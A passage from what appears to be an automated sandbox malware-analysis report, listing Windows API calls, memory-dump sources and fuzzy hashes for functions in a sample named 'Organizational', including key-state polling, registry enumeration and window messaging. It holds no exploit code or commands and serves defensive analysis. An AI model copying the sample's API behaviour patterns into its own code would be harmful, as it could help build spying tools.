                                                    • Opcode Fuzzy Hash: f6294fa45708ef6ee68f48f39c236318475bca00a0838ef5171beb9a65e15881
                                                    • Instruction Fuzzy Hash: E8218E71600609AFFF108E649C80EBB77ADEB59334F50C61AFA58E2190D739DC51BB61
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F57377
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F573AA
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00F573BC
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F573F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: a205eca9bb47e21a2c6fa61ae5958aa5e802cc89718851e8659e8e796ff0b7ab
                                                    • Instruction ID: 4324939fd0e728abcfcf574160b550b582eeb4509c00393bad0e85628496074c
                                                    • Opcode Fuzzy Hash: a205eca9bb47e21a2c6fa61ae5958aa5e802cc89718851e8659e8e796ff0b7ab
                                                    • Instruction Fuzzy Hash: 6F21AC715083069FDB10AF65EC05A997BE4AF45731F204A19FDA0D72D0D771D858FB50
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F57444
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F57476
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00F57487
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F574C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 4b925e7ece16ae0bb2a5f7f8c08a9bb4cc8a0e7396b1ee63e09dc7275d551d93
                                                    • Instruction ID: 13755e82be8d208ce738020a69132ed32f6e38e6e921eb8e6d86675dec63f821
                                                    • Opcode Fuzzy Hash: 4b925e7ece16ae0bb2a5f7f8c08a9bb4cc8a0e7396b1ee63e09dc7275d551d93
                                                    • Instruction Fuzzy Hash: B921A771908305DBDB20EF69AC48E997BA8AF55731F200B19FEB0D72D0DB709858EB51
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F5B297
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F5B2EB
                                                    • __swprintf.LIBCMT ref: 00F5B304
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F80980), ref: 00F5B342
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 2b68e943634286e3acd5c11f1c4ce238818d29839f66d1bb9baadb5c2db74ac4
                                                    • Instruction ID: 504fb625abf50447fb9d0d658ba53fddfc1ad71f5e1d91343fa67f74563854a2
                                                    • Opcode Fuzzy Hash: 2b68e943634286e3acd5c11f1c4ce238818d29839f66d1bb9baadb5c2db74ac4
                                                    • Instruction Fuzzy Hash: 60218371A0010CAFCB10EF64CC85DEEBBB8EF89714B104069F909E7252DB71EA45DB61
                                                    APIs
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                      • Part of subcall function 00F4AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F4AA6F
                                                      • Part of subcall function 00F4AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4AA82
                                                      • Part of subcall function 00F4AA52: GetCurrentThreadId.KERNEL32 ref: 00F4AA89
                                                      • Part of subcall function 00F4AA52: AttachThreadInput.USER32(00000000), ref: 00F4AA90
                                                    • GetFocus.USER32 ref: 00F4AC2A
                                                      • Part of subcall function 00F4AA9B: GetParent.USER32(?), ref: 00F4AAA9
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F4AC73
                                                    • EnumChildWindows.USER32(?,00F4ACEB), ref: 00F4AC9B
                                                    • __swprintf.LIBCMT ref: 00F4ACB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                    • String ID: %s%d
                                                    • API String ID: 1941087503-1110647743
                                                    • Opcode ID: 7a18ad13a60ac6fc2c4b395c290bbdc8e08472d2bc25a1539084802520b0e487
                                                    • Instruction ID: d0566e66a267d8e49d372fe72a1dd69f8c35d7dda72a0727a80848b1233df673
                                                    • Opcode Fuzzy Hash: 7a18ad13a60ac6fc2c4b395c290bbdc8e08472d2bc25a1539084802520b0e487
                                                    • Instruction Fuzzy Hash: 4411B775640205ABDF51BFA0CD85FEA3B6CAF45710F004075FE18AA182DA789949FB71
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F52318
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: 8c7b0a55209408759533dd234b71281c2024bc2892b68287bc8b1364107669c6
                                                    • Instruction ID: 063be5cfa0d454f0a9ae36bad24eb54d3ba0676e91f8b543c18eef6aadc3f4fe
                                                    • Opcode Fuzzy Hash: 8c7b0a55209408759533dd234b71281c2024bc2892b68287bc8b1364107669c6
                                                    • Instruction Fuzzy Hash: CE118B70900119DFCF40EFA4D8504EEB3B4FF16304B508168E810A72A2EF3A6E4AEF40
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F6F2F0
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F6F320
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F6F453
                                                    • CloseHandle.KERNEL32(?), ref: 00F6F4D4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 634d2e65a34a84fed75b9e73bf07ad3c22216d42a4c62c924d08a861de60460b
                                                    • Instruction ID: a67f96b0a0b15b3a4b650c4be7a16830b8d614e0981cf1ff7f849de13b606c83
                                                    • Opcode Fuzzy Hash: 634d2e65a34a84fed75b9e73bf07ad3c22216d42a4c62c924d08a861de60460b
                                                    • Instruction Fuzzy Hash: 7E8161B16047049FD720EF24D846F3BB7E5AF44720F14892DFA59AB2D2DB71AC448B51
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F7075D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F7079C
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F707E3
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00F7080F
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F7081C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: 290a788f74ea45254b15a9eb32d5c78960543b1b4f097aedfa10f0dc185c0aeb
                                                    • Instruction ID: 58390ad9c5c43372f99e967858a91dbb66fc122835d55b02dd20e43e7f23c752
                                                    • Opcode Fuzzy Hash: 290a788f74ea45254b15a9eb32d5c78960543b1b4f097aedfa10f0dc185c0aeb
                                                    • Instruction Fuzzy Hash: 50514A71208204EFD714EF64CC81F6AB7E9BF84314F00891EF59997292DB34E905EB52
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F5EC62
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F5EC8B
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F5ECCA
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F5ECEF
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F5ECF7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: a7c31d84abae30d36a3ad0fea5506d6fd9318666c5bf74f24917d4b26a566fff
                                                    • Instruction ID: 0693c7b421fdfe80cb8aac48c534b79e356eba922253657664f64f4a8dfff423
                                                    • Opcode Fuzzy Hash: a7c31d84abae30d36a3ad0fea5506d6fd9318666c5bf74f24917d4b26a566fff
                                                    • Instruction Fuzzy Hash: 79513975A00109DFCB05EF64C985EAEBBF5EF08310B148099E909AB3A2CB35ED55EB50
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9556a3349fa924f05f3a8abffb26b5fa00fed94a613bd13c545f70d43738256e
                                                    • Instruction ID: 8bf837f92dbcd4278bbd462bfd47ae77f6f72d0c7bc363901aeddf5c4bfe9a8f
                                                    • Opcode Fuzzy Hash: 9556a3349fa924f05f3a8abffb26b5fa00fed94a613bd13c545f70d43738256e
                                                    • Instruction Fuzzy Hash: 4A41D536D00108AFD718DB28CC84FBDB7B4EB89320F568166E91DA72D1D6709D52FA52
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00EF2727
                                                    • ScreenToClient.USER32(00FB77B0,?), ref: 00EF2744
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00EF2769
                                                    • GetAsyncKeyState.USER32(00000002), ref: 00EF2777
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: ea01e1eec489c871575b2c0685ff59752a5b32e1163aebdd498cbdc9ae425386
                                                    • Instruction ID: 1099f6e04d63ace9fce2aa584d53bc1bbab153690488ec11a472785bc295f35b
                                                    • Opcode Fuzzy Hash: ea01e1eec489c871575b2c0685ff59752a5b32e1163aebdd498cbdc9ae425386
                                                    • Instruction Fuzzy Hash: 17416D35904119FBDF199F68C844AFDBB74BB05364F20831AF928A62D0CB31AD54EB91
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F495E8
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00F49692
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F4969A
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00F496A8
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F496B0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 56234c4886751fd7ed601297f9dfce88abc85b9e3f98091dd53aa13d7258017e
                                                    • Instruction ID: 2bb8143ab8e762d414f432bb7a47661e18264748bf06bba54c741c03ea18b3cc
                                                    • Opcode Fuzzy Hash: 56234c4886751fd7ed601297f9dfce88abc85b9e3f98091dd53aa13d7258017e
                                                    • Instruction Fuzzy Hash: 8D31BC71A04219EBDB14CF68D94DAEE3FB5EB44325F114219FD24AA2D0C7B09924EB90
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00F4BD9D
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F4BDBA
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F4BDF2
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F4BE18
                                                    • _wcsstr.LIBCMT ref: 00F4BE22
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: 2e2829aac64200d67a16bbd788d53ac73e4fa8b05d6e526a85a2d417c364be3f
                                                    • Instruction ID: 5c54940b3defc0df5c1049bb0d4dd3a022ddb2f720933c7c8beb6dd1d4841d8c
                                                    • Opcode Fuzzy Hash: 2e2829aac64200d67a16bbd788d53ac73e4fa8b05d6e526a85a2d417c364be3f
                                                    • Instruction Fuzzy Hash: B3210732A04204BAEB255B759C09EBB7FACDF88760F104069FD09CA192EF65CC91B760
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F7B804
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F7B829
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F7B841
                                                    • GetSystemMetrics.USER32(00000004), ref: 00F7B86A
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F6155C,00000000), ref: 00F7B888
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: 62a6618cf343dd5e8fd3b7df0a4845dc79ec0b4201bf6ff6d79a64652d926408
                                                    • Instruction ID: 263b113880c0a53bd6a5f890285e583942bfd1ba233270e9416e4bfb6bb01438
                                                    • Opcode Fuzzy Hash: 62a6618cf343dd5e8fd3b7df0a4845dc79ec0b4201bf6ff6d79a64652d926408
                                                    • Instruction Fuzzy Hash: 1C21A631914219AFCB149F39CC04B6937A8FB46331F24873AF929D75E0D7308811EB92
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 00F66159
                                                    • GetForegroundWindow.USER32 ref: 00F66170
                                                    • GetDC.USER32(00000000), ref: 00F661AC
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00F661B8
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00F661F3
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: 14b75fd8b76fc454b4b275c2f62ffe6cf134b57311ed5a391f4db985a273ddc6
                                                    • Instruction ID: 26c500d94c7bcd76088083b0973995eef3bd77cdcc8fc52634520e3ca40285a6
                                                    • Opcode Fuzzy Hash: 14b75fd8b76fc454b4b275c2f62ffe6cf134b57311ed5a391f4db985a273ddc6
                                                    • Instruction Fuzzy Hash: 3821C676A00608AFD700EF65DC88AAABBF5EF48311F048469F94AD7352DF30AC05DB90
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EF1729
                                                    • SelectObject.GDI32(?,00000000), ref: 00EF1738
                                                    • BeginPath.GDI32(?), ref: 00EF174F
                                                    • SelectObject.GDI32(?,00000000), ref: 00EF1778
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: cc6b5b046f5f57db895c76db790407afc6528504983c30dfdd2ea1aa239b13aa
                                                    • Instruction ID: cb50952b94245358937c333d165bdee00a2be08e16bc0a26dd17038b81771cb3
                                                    • Opcode Fuzzy Hash: cc6b5b046f5f57db895c76db790407afc6528504983c30dfdd2ea1aa239b13aa
                                                    • Instruction Fuzzy Hash: 9E21A13080430CEBDB11AF24EC887BA7BA8FB41325F244396F919A61E0D770D995EF90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 83cb80cbe058c9ad694e52acb880b5ab8bc0bc87433f588b984254d80c969fd2
                                                    • Instruction ID: 348a9057336c43446127c213584ce00123602f51cb53cad7eb8de6776f4afcaf
                                                    • Opcode Fuzzy Hash: 83cb80cbe058c9ad694e52acb880b5ab8bc0bc87433f588b984254d80c969fd2
